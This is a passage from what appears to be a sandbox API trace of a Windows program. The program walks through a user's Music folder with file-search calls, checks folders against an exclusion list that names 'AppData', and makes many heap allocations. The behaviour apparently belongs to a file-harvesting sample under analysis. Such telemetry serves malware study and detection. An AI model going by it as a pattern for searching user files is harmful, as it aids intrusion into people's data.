ftLastWriteTime.dwLowDateTime=0x1ccfcb50, ftLastWriteTime.dwHighDateTime=0x1d5e03b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ETYJoLZsQISXnK0OL", cAlternateFileName="ETYJOL~1")) returned 1 [0157.642] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL", cchCount1=17, lpString2="AppData", cchCount2=7) returned 3 [0157.642] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c59920, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x1ccfcb50, ftLastAccessTime.dwHighDateTime=0x1d5e03b, ftLastWriteTime.dwLowDateTime=0x1ccfcb50, ftLastWriteTime.dwHighDateTime=0x1d5e03b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.845] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c59920, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x1ccfcb50, ftLastAccessTime.dwHighDateTime=0x1d5e03b, ftLastWriteTime.dwLowDateTime=0x1ccfcb50, ftLastWriteTime.dwHighDateTime=0x1d5e03b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.845] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x94d68360, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 1 [0157.846] TranslateMessage (lpMsg=0x87ebe4) returned 0 [0157.846] DispatchMessageW (lpMsg=0x87ebe4) returned 0x0 [0157.846] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e280) returned 1 [0157.847] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0157.847] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0157.847] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1de0 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d00 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1de0 | out: hHeap=0x8a0000) returned 1 [0157.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.848] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0157.848] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1de0 [0157.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1de0 | out: hHeap=0x8a0000) returned 1 [0157.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1de0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.849] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d00 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.849] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d00 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.849] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d00 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e30 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8e2af8 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e70 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e70 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2af8 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.850] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.851] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e30 [0157.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.851] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e30 [0157.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0157.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.852] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0xefe21660, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 1 [0157.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0157.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.853] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e30 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.853] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e30 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.854] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e30 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d00 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2af8 [0157.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e70 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e70 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2af8 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.855] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.856] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d00 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.856] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d00 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.856] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847a90, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x65d0360, ftLastAccessTime.dwHighDateTime=0x1d5deba, ftLastWriteTime.dwLowDateTime=0x65d0360, ftLastWriteTime.dwHighDateTime=0x1d5deba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="fgMpL3n", cAlternateFileName="")) returned 1 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.856] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d00 [0157.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.857] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d00 [0157.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.857] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cb0 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d00 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e30 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e70 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e70 | out: hHeap=0x8a0000) returned 1 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.858] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cb0 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x8ee400 [0157.858] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee400 | out: hHeap=0x8a0000) returned 1 [0157.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1cb0 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d00 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e30 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e70 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 